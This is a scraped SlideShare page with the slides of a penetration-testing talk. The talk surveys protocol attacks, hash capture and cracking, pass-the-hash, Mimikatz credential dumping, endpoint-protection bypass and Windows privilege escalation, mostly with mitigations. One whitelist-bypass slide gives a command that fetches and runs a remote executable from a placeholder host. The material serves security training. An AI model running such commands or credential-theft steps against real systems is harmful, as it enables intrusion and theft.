SlideShare a Scribd company logo

Attack All The Layers - What's Working in Penetration Testing

NetSPI
NetSPI
Technology
1 of 58
Download to read offline
Attack All the Layers: What’s Working During Pen Tests Scott Sutherland and Karl Fosaaen
Introductions • Scott Sutherland ‒ Principal Security Consultant @ NetSPI ‒ Twitter: @_nullbind • Karl Fosaaen ‒ Senior Security Consultant @ NetSPI ‒ Twitter: @kfosaaen We specialize in both things and stuff!
Overview • Why do Companies Pen Test? • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation • Conclusions
Why do companies pen test? • Compliance requirements • Evaluate risks associated with an acquisition or partnership • Validate preventative controls • Validate detective controls • Prioritize internal security initiatives • Proactively prevent breaches
Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
Attacking protocols • ARP: Address Resolution Protocol • NBNS: NetBIOS Name Service • SMB: Server Message Block • PXE: Preboot Execution Environment • DTP: Dynamic Trunking Protocol
Attacking protocols: ARP Address Resolution Protocol
Attacking protocols: ARP • General ‒MAC to IP association ‒Layer 2 • Conditions ‒Independent of user action ‒Broadcast network • Attacks ‒MITM Monitoring ‒MITM Injection ‒DOS
Attacking protocols: ARP
Attacking protocols: ARP • Common mitigating controls: ‒ Dynamic ARP Inspection ‒ Port Security ‒ Static Routes (not recommended)
Attacking protocols: NBNS / LLMNR NetBIOS Name Service
Attacking protocols: NBNS • General ‒ IP to hostname association ‒ Layer 5 / 7 • Constraints ‒ Dependent on user action ‒ Broadcast Network ‒ Windows Only • Attacks ‒ MITM Monitoring ‒ MITM Injection ‒ DOS
Attacking protocols: NBNS
Attacking protocols: NBNS
Attacking protocols: NBNS
Attacking protocols: NBNS • Common mitigating controls: ‒ Create a WPAD (Web Proxy Auto-Discovery) server entry in DNS ‒ Disable NBNS (recommended) • Might cause issues with legacy apps ‒ Disable insecure authentication to help • limit impact of exposed hashes ‒ Enable packet signing to help prevent • SMB Relay attacks
Attacking protocols: SMB Server Message Block
Attacking protocols: SMB • General ‒ SMB is the come back kid! ‒ Layer 7 • Constraints ‒ Dependent on user action ‒ Any routable network ‒ No connecting back to originating host • Attacks ‒ Command execution ‒ Shells..aaand shells
Attacking protocols: SMB
Attacking protocols: SMB • Historically, SMB Relay has been used to: ‒ Execute arbitrary commands ‒ Obtain shells • Lately the community has been developing tools for doing things like: ‒ LDAP queries ‒ SQL queries ‒ Exchange services ‒ Mounting file systems
Attacking protocols: SMB • Common mitigating controls: ‒ Enable packet signing to help prevent SMB Relay attacks ‒ Apply really old patches like if you missed out on the last decade…
Attacking protocols: PXE Preboot eXecution Environment
Attacking protocols: PXE • General ‒ DHCP • Constraints ‒ Broadcast domain • Attacks ‒ Command execution ‒ Access to file system/images
Attacking protocols: PXE • Common mitigating controls: ‒ Isolate networks ‒ Add device validation
Attacking protocols: DTP Dynamic Trunking Protocol
Attacking protocols: DTP • General ‒ 802.1Q encapsulation is in use ‒ Layer 2 • Constraints ‒ Independent of user action ‒ Trunking is set to enabled • or auto on switch port • Attacks ‒ Monitor network traffic for all VLANs, because all VLANs are • allowed on a trunk by default • *Full VLAN hopping
Attacking protocols: DTP
Attacking protocols: DTP
Attacking protocols: DTP
Attacking protocols: DTP
Attacking protocols: DTP • Common mitigating controls: ‒ Use dedicated VLAN ID for all trunking ports ‒ Disable all unused ports and place them on a non-routable VLAN ‒ Configure all user ports as access ports to prevent trunk negotiation ‒ Configure frames with two 802.1Q headers ‒ Configure strong VACLs
Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
Attacking passwords • Hashes and Cracking (Offline) • Dictionary Attacks (Online) • Dump in Cleartext!
Attacking Passwords Tool Function Year Pass the Hash Passing Hashes 1997 Rainbow Tables Password Cracking 2000s SMB Relay Relaying Captured Hashes 2001 John the Ripper Password Cracking 2001 NetNTLM.pl Cracking Network Hashes 2007 PTH Toolkit Pass all the Hashes 2008 Hashcat CPU and GPU Cracking 2010 WCE and Mimikatz Cleartext Windows Creds 2012
Attacking Passwords: Hashes • What are hashes? ‒ A non-reversible way of storing passwords ‒ Operating systems and applications ‒ Lots of types • LM/NTLM • Network and Local • MD5 • SHA • descrypt
Attacking Passwords: Hashes • How do we get hashes? ‒ Cain and Abel ‒ fgdump ‒ Metasploit ‒ Mimikatz ‒ Databases ‒ Config files
Attacking Passwords: Cracking • Cracking Hashes ‒ Rainbow Tables ‒ John the Ripper ‒ oclHashcat ‒ CPU versus GPU
Attacking Passwords: Cracking 0 100 200 300 400 500 600 Minutes for Six Character Brute Force CPU GPU
Attacking Passwords: CrackingGPUCPU
Attacking Passwords: Passing Hashes • Passing Hashes ‒ Metasploit ‒ psexec ‒ winexec ‒ PTH toolkit
Attacking Passwords: Dictionary • Online Vs. Offline Attacks • Dictionary Attacks ‒ Enumerate users • Null SMB logins, RPC, *SID BF, SNMP, LDAP, SharePoint, etc. ‒ Attack! • Are users getting smarter? ‒ Sort of… • “Summer2014” meets password • complexity requirements
Attacking Passwords: Cleartext • Common application configs • Reversible Formats ‒ Find in files ‒ Groups.xml ‒ Unattend.xml ‒ Registry • WCE • Mimikatz
Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
Attacking Applications: Common • Default and weak passwords • SQL injection • RFI/web shells • Web directory traversals • UNC path injection + SMB relay • Critical missing patches
Attacking Applications: Breakouts • Obtain a common dialog box • Bypass folder path and file type restrictions • Bypass file execution restrictions • Bypass file black/white lists • Access to native consoles and management tools • Downloading and use third party applications
Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
Bypassing EPP: Anti-virus • PowerShell code Injection • Execute off network share • Clone resource tables • Modify import tables • Pack files
Bypassing EPP: App White List • Execution via approved apps ‒ Powershell Code Injection ‒ Rundll32 mydll,DLLMain@12 ‒ IEExec http://x.x.x.x:8080/bypass.exe • Exceptions ‒ File name ‒ Publisher ‒ Directory • Excessive privileges ‒ Services and policy
Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
Windows Escalation: Overview • Privilege Escalation Goals • Local Privilege Escalation • Domain Privilege Escalation
Windows Escalation: Goals • Local Escalation Goals ‒ Find clear text or reversible credentials with local administrative privileges ‒ Get application to run commands as Administrator or LocalSystem • Domain Escalation Goals ‒ Find Domain Admins ‒ Impersonate Domain Admins
Windows Escalation: Local • Local Escalation ‒ *Clear text credentials in files, registry, over network ‒ Insecure service paths ‒ DLL preloading ‒ DLL and exe replacement ‒ Binary planting in auto-run locations (reg and file system) ‒ Modifying schedule tasks ‒ *Local and remote exploits ‒ Leverage local application like IIS, SQL Server etc ‒ *UNC path injection + SMB Relay / Capture + crack
Windows Escalation: Domain • Domain Escalation – Find DAs ‒ Check locally! (Processes, Tokens, Cachedump) ‒ Review active sessions – netsess (veil) ‒ Review remote processes - tasklist ‒ Service Principal Names (SPN) – get-spn ‒ Scanning Remote Systems for NetBIOS Information - nbtscan ‒ Pass the hash to other systems ‒ PowerShell shell spraying ‒ WINRM/WINRS shell spraying ‒ Psexec shell spraying
Windows Escalation: Domain • Domain Escalation – Impersonate DAs ‒ Dump passwords from memory with Mimikatz ‒ Migrate into the Domain Admin’s process ‒ Steal Domain Admins delegation tokens with Incognito ‒ Dump cached domain admin hashes with cachedump ‒ Relatively new techniques • PTH using Kerberos ticket
Conclusions • Most Networks ‒ Kind of broken • Most Protocols ‒ Kind of broken • Most Applications ‒ Kind of broken All can kind of be fixed
Attack all the layers! • Any questions?
Attack all the layers! • Scott Sutherland ‒ Principal Security Consultant ‒ Twitter: @_nullbind • Karl Fosaaen ‒ Senior Security Consultant ‒ Twitter: @kfosaaen

Recommended

Extracting Credentials From Windows
Extracting Credentials From WindowsExtracting Credentials From Windows
Extracting Credentials From WindowsNetSPI
 
Attack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingAttack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingNetSPI
 
All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015NetSPI
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksNetSPI
 
Fuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox TestingFuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox TestingNetSPI
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Scott Sutherland
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Scott Sutherland
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360Scott Sutherland
 

Recommended

Extracting Credentials From Windows
Extracting Credentials From WindowsExtracting Credentials From Windows
Extracting Credentials From WindowsNetSPI
 
Attack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingAttack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingNetSPI
 
All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015NetSPI
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksNetSPI
 
Fuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox TestingFuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox TestingNetSPI
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Scott Sutherland
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Scott Sutherland
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360Scott Sutherland
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseNetSPI
 
07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security productsNCC Group
 
SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedMicah Hoffman
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwarePriyanka Aash
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud HackNotSoSecure Global Services
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking AuthenticationSam Bowne
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainPriyanka Aash
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the KingdomDennis Maldonado
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Xavier Ashe
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaEC-Council
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysJoff Thyer
 
Injection flaw teaser
Injection flaw teaserInjection flaw teaser
Injection flaw teaserNotSoSecure Global Services
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingSam Bowne
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseScott Sutherland
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beau Bullock
 
Prowler: BlackHat Europe Arsenal 2018
Prowler: BlackHat Europe Arsenal 2018Prowler: BlackHat Europe Arsenal 2018
Prowler: BlackHat Europe Arsenal 2018Toni de la Fuente
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101dc612
 
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...EC-Council
 
Thick client application security assessment
Thick client application security assessmentThick client application security assessment
Thick client application security assessmentSanjay Kumar (Seeking options outside India)
 
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2NetSPI
 

More Related Content

What's hot

Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseNetSPI
 
07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security productsNCC Group
 
SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedMicah Hoffman
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwarePriyanka Aash
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking AuthenticationSam Bowne
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainPriyanka Aash
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the KingdomDennis Maldonado
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Xavier Ashe
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaEC-Council
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysJoff Thyer
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingSam Bowne
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseScott Sutherland
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beau Bullock
 
Prowler: BlackHat Europe Arsenal 2018
Prowler: BlackHat Europe Arsenal 2018Prowler: BlackHat Europe Arsenal 2018
Prowler: BlackHat Europe Arsenal 2018Toni de la Fuente
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101dc612
 
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...EC-Council
 

What's hot (20)

Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash Course
 
07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products
 
SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection Exploited
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking Authentication
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George Dobrea
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
Injection flaw teaser
Injection flaw teaserInjection flaw teaser
Injection flaw teaser
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
 
Prowler: BlackHat Europe Arsenal 2018
Prowler: BlackHat Europe Arsenal 2018Prowler: BlackHat Europe Arsenal 2018
Prowler: BlackHat Europe Arsenal 2018
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
 
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
 

Viewers also liked

Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2NetSPI
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingAmine SAIGHI
 
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaNessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaHanaysha
 
Vulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements inVulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements inKeith G. Tidball
 
Beyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability AssessmentBeyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability AssessmentDamon Small
 
PCI Guidance On Penetration Testing
PCI Guidance On Penetration TestingPCI Guidance On Penetration Testing
PCI Guidance On Penetration TestingThe Hacker News
 
GPU Cracking - On the Cheap
GPU Cracking - On the CheapGPU Cracking - On the Cheap
GPU Cracking - On the CheapNetSPI
 
Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case studyAntonio Fontes
 
Penetration testing, What’s this?
Penetration testing, What’s this?Penetration testing, What’s this?
Penetration testing, What’s this?Dmitry Evteev
 
Penetration testing
Penetration testingPenetration testing
Penetration testingAmmar WK
 
Penetration Testing vs. Vulnerability Scanning
Penetration Testing vs. Vulnerability ScanningPenetration Testing vs. Vulnerability Scanning
Penetration Testing vs. Vulnerability ScanningSecurityMetrics
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report Rishabh Upadhyay
 
Vulnerability Assessment and Penetration Testing Framework by Falgun Rathod
Vulnerability Assessment and Penetration Testing Framework by Falgun RathodVulnerability Assessment and Penetration Testing Framework by Falgun Rathod
Vulnerability Assessment and Penetration Testing Framework by Falgun RathodFalgun Rathod
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introductiongbud7
 
NETWORK PENETRATION TESTING
NETWORK PENETRATION TESTINGNETWORK PENETRATION TESTING
NETWORK PENETRATION TESTINGEr Vivek Rana
 

Viewers also liked (19)

Thick client application security assessment
Thick client application security assessmentThick client application security assessment
Thick client application security assessment
 
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Web application Testing
Web application TestingWeb application Testing
Web application Testing
 
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaNessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq Hanaysha
 
Vulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements inVulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements in
 
Beyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability AssessmentBeyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability Assessment
 
PCI Guidance On Penetration Testing
PCI Guidance On Penetration TestingPCI Guidance On Penetration Testing
PCI Guidance On Penetration Testing
 
GPU Cracking - On the Cheap
GPU Cracking - On the CheapGPU Cracking - On the Cheap
GPU Cracking - On the Cheap
 
Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case study
 
Penetration testing, What’s this?
Penetration testing, What’s this?Penetration testing, What’s this?
Penetration testing, What’s this?
 
Vulnerability Assessment Report
Vulnerability Assessment ReportVulnerability Assessment Report
Vulnerability Assessment Report
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
 
Penetration Testing vs. Vulnerability Scanning
Penetration Testing vs. Vulnerability ScanningPenetration Testing vs. Vulnerability Scanning
Penetration Testing vs. Vulnerability Scanning
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report
 
Vulnerability Assessment and Penetration Testing Framework by Falgun Rathod
Vulnerability Assessment and Penetration Testing Framework by Falgun RathodVulnerability Assessment and Penetration Testing Framework by Falgun Rathod
Vulnerability Assessment and Penetration Testing Framework by Falgun Rathod
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introduction
 
NETWORK PENETRATION TESTING
NETWORK PENETRATION TESTINGNETWORK PENETRATION TESTING
NETWORK PENETRATION TESTING
 

Similar to Attack All The Layers - What's Working in Penetration Testing

CNIT 123: 8: Desktop and Server OS Vulnerabilites
CNIT 123: 8: Desktop and Server OS VulnerabilitesCNIT 123: 8: Desktop and Server OS Vulnerabilites
CNIT 123: 8: Desktop and Server OS VulnerabilitesSam Bowne
 
Ch 8: Desktop and Server OS Vulnerabilites
Ch 8: Desktop and Server OS VulnerabilitesCh 8: Desktop and Server OS Vulnerabilites
Ch 8: Desktop and Server OS VulnerabilitesSam Bowne
 
CNIT 123 Ch 8: OS Vulnerabilities
CNIT 123 Ch 8: OS VulnerabilitiesCNIT 123 Ch 8: OS Vulnerabilities
CNIT 123 Ch 8: OS VulnerabilitiesSam Bowne
 
CNIT 123 8: Desktop and Server OS Vulnerabilities
CNIT 123 8: Desktop and Server OS VulnerabilitiesCNIT 123 8: Desktop and Server OS Vulnerabilities
CNIT 123 8: Desktop and Server OS VulnerabilitiesSam Bowne
 
640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths640-554 IT Certification and Career Paths
640-554 IT Certification and Career Pathshibaehed
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombPriyanka Aash
 
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain AccessDefcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Accesseightbit
 
QA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QAQA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QACodeFest
 
A Byte of Software Deployment
A Byte of Software DeploymentA Byte of Software Deployment
A Byte of Software DeploymentGong Haibing
 
Application and Server Security
Application and Server SecurityApplication and Server Security
Application and Server SecurityBrian Pontarelli
 
TTL Alfresco Product Security and Best Practices 2017
